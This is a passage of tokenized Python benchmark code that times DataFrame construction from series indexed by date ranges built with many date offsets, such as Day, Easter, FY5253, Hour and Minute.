randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_CustomBusinessDayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_DateOffsetx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( DateOffset ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_DateOffsetx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_DateOffsetx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( DateOffset ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_DateOffsetx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Dayx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Day ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Dayx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Dayx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Day ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Dayx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Easterx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Easter ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Easterx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Easterx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Easter ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Easterx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253Quarterx1__variation_last ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253Quarter ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253Quarterx1__variation_last ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253Quarterx1__variation_nearest ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253Quarter ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253Quarterx1__variation_nearest ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253Quarterx2__variation_last ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253Quarter ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253Quarterx2__variation_last ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253Quarterx2__variation_nearest ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253Quarter ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253Quarterx2__variation_nearest ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253x1__variation_last ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253 ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253x1__variation_last ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253x1__variation_nearest ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253 ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253x1__variation_nearest ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253x2__variation_last ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253 ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253x2__variation_last ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_FY5253x2__variation_nearest ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( FY5253 ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_FY5253x2__variation_nearest ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Hourx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Hour ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Hourx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Hourx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Hour ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Hourx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_LastWeekOfMonthx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( LastWeekOfMonth ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_LastWeekOfMonthx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_LastWeekOfMonthx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( LastWeekOfMonth ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_LastWeekOfMonthx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Microx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Micro ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Microx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Microx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Micro ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Microx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Millix1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Milli ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Millix1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Millix2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Milli ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Millix2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Minutex1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Minute ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Minutex1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Minutex2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Minute ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def 